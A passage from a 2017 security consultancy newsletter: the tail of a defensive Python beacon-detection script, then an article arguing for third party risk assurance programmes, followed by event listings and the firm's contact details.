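        gaps = [(b - a).total_seconds() / 3600 for a, b in zip(stamps, stamps[1:])]
        reasons = []
        if on_watchlist(host):
            reasons.append("watchlist")
        if (len(stamps) >= min_hits and abs(mean(gaps) - period_h) <= tol_h
                and pstdev(gaps) <= tol_h):
            reasons.append("periodic")
        if reasons:
            findings.append((client, host, round(mean(gaps), 2) if gaps else None,
                             tuple(reasons)))
    return findings

if __name__ == "__main__":
    for client, host, gap, reasons in find_beacons(SAMPLE_LOG):
        print(f"{client} -> {host}: mean gap {gap} h ({', '.join(reasons)})")
```

The periodicity check is independent of the watchlist, so it also surfaces a fixed-interval beacon to a domain nobody has listed yet.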



Third Party Assurance: Why bother?



About the Author: Haydn Brooks is a Manager at Secgate. Haydn specialises in helping companies at C-suite level establish and improve their third party risk management, logical IT security, physical security, security training and awareness and cyber strategy. He has a wealth of experience across the banking, financial and healthcare sectors.

ABSTRACT

Companies, large and small, rely heavily on their supply chain to run their business. As the number of third parties with access to company and customer data increases, so does the risk of security breaches that have the ability to damage the reputation and sustainability of the business. Third party assurance services can reduce these risks by developing governance and monitoring processes that ensure third parties are managing your data and their own risk appropriately. With threats constantly evolving, the need for a quality third party assurance service is increasing.

INTRODUCTION

Third party risk management is expensive. It involves performing security reviews of companies that don’t want to be (and don’t have the time to be) reviewed. To be successful it requires input from your procurement, legal, information security and internal audit teams, and in order to add any real business value it has to be integrated into a process that produces a real and tangible business outcome. C-level executives have enough on their plate worrying about risks to their own business, let alone other people’s businesses. So why bother? The reasons are the same reasons that we hear time and time again: operational, reputational, financial and, if your business sits within the financial sector, compliance risk. In short, a failure of one of your third parties will cost you money, clients and time.

At Secgate we like to visualise each one of these four risks by placing them into two main categories – risks to your company’s confidentiality (the ability to protect your customers’ data and your business's intellectual property) and risks to your company’s availability (the ability of your company to maintain the service it provides to its clients).

CONFIDENTIALITY

Customers have to hand out a massive amount of personally identifiable information in order to do anything in this day and age. They therefore trust you, the custodian of their data, to keep it personal. A data breach at one of your suppliers, whether it is a supplier that handles customer credit card information or purely a marketing agency that handles customer names and phone numbers, will erode the trust your customers have in your business. And this will occur whether the breach was malicious or accidental. It will make customers think twice about handing over their personal information to you in the future, and this trust will take time to repair and rebuild. This loss of trust in your business and brand is, in essence, reputational damage. Damaged brands don’t do well. Think 2013 and Target’s data breach. Target’s stock price dropped by approximately 10% in the time after the breach was announced, all because of a third party HVAC (heating, ventilation and air conditioning) supplier that you probably can’t name (I know I can’t). Could your business recover from a hit of that magnitude to its bottom line?



AVAILABILITY

Outsourcing is one of the most popular pastimes of businesses in this day and age. Entire consultancies specialise in helping companies outsource pretty much any function they have, from HR through to payroll and IT. Companies are even outsourcing their C-suite executives. And you trust these companies to be able to maintain the same quality and availability that you would come to expect of an in-house service. And why shouldn’t you trust them? That’s the service you are paying for. But what happens when something happens that means these companies can no longer operate? This category is wider than information security. What happens when the supplier managing your help desk is hit by a flash flood? But that could never happen, could it? Just remember that an inch of snow can bring London to a standstill. Could your company operate without its payroll function? Could your company operate without an IT help desk, or, even worse, without any IT capability at all? It’s at times like these that strong business continuity and IT disaster recovery (BC/ITDR) plans become a lifesaver. But why should your company have to invoke a business continuity plan and absorb the associated cost? Isn’t that the job of the company that suffered the incident? Ensuring that your suppliers have a strong, robust and well thought out business continuity and ITDR capability will reduce the chance that your company ever has to invoke its own business continuity plan, preventing operational and financial impacts and mitigating both operational and financial risk.

SO THIS IS ABOUT TRUST?

No. Third party assurance is not about your company not trusting its suppliers. It’s about collaboration. It’s about the sharing of best practice. It’s about saying that no matter how mature your information security control environment is, let’s help each other to improve it. And it’s this constant improvement that helps create a robust and resilient economy that can benefit everyone.



FINE, YOU HAVE MY ATTENTION. SO WHAT CAN I DO?

Firstly, you need to ensure that your company knows what it is dealing with. Do you have a comprehensive third party inventory? Do you know what third parties you use, the service each one of those third parties provides and the data that they take from you to provide it? Does your CISO team talk to your procurement team to get this information? Does your procurement team even have the information?

Secondly, you need to focus your attention on the suppliers that matter most. Rank your suppliers in order of importance from both a confidentiality and an availability perspective. A supplier may be supercritical when looked at through a confidentiality lens but bottom of the pile from an availability lens, and should be reviewed accordingly. Your CISO team cannot do this alone. Your procurement and supplier management teams have to be involved.

Thirdly, implement a third party assurance programme. Look at the controls you have in place to mitigate the risk third parties present to your business. Do your third party contracts contain the required clauses (this will involve speaking to your legal team)? Do you check that third parties maintain their information security control environment? Do you check that your third parties are robust enough to recover from incidents and business continuity issues? Combine the criticality of each third party with the results from your third party assurance programme to measure the risk that third party poses to your business. Treat a strong third party review as indicating a low risk of an incident occurring at that third party, and feed the combined result into your business's central risk framework. Finally, compare this risk to your risk appetite – are you happy with the risk posed by the third parties that your company uses?


Haydn Brooks Information Security Manager at Secgate



Cyber World Missed an edition? Want to subscribe? Want a hardcopy? Want to contribute? Contact us on cyber@secgate.co.uk



Upcoming Events

RSA CONFERENCE USA hosted in San Francisco, US from the 13th to the 17th of February 2017

WORLD CYBER SECURITY CONGRESS 2017 hosted in London, UK from the 7th to the 8th of March 2017

EUROPEAN INFORMATION SECURITY SUMMIT 2017 (TEISS) hosted in London, UK from the 21st to the 22nd of February 2017

CYBER INTELLIGENCE ASIA hosted in Kuala Lumpur, Malaysia from the 14th to the 16th of March 2017

SC CONGRESS LONDON 2017 hosted in London, UK on the 23rd of February 2017

CYBERUK 2017 hosted in Liverpool, UK from the 14th to the 16th of March 2017

EUROPEAN SMART GRID CYBER SECURITY hosted in London, UK from the 21st to the 23rd of March 2017




About Secgate

Secgate is a specialist security advisory group. Our consultants are skilled and experienced professionals having trained and worked within the consultancy arms of the Big 4 professional services firms. Our technical capabilities, expert business advice and diverse experience in delivering security and advisory services put us on par with the very best of the Cyber Security advisory industry. We are uniquely placed in the market – we are able to provide high quality Cyber Security professional services for more competitive and flexible prices than those associated with working with larger consultancies.

www.secgate.co.uk
info@secgate.co.uk
Berkeley Square House, Mayfair, London W1, United Kingdom
Office: +44 (0) 207 887 6423
Mobile: +44 (0) 747 193 7777
Mobile: +44 (0) 744 925 8888


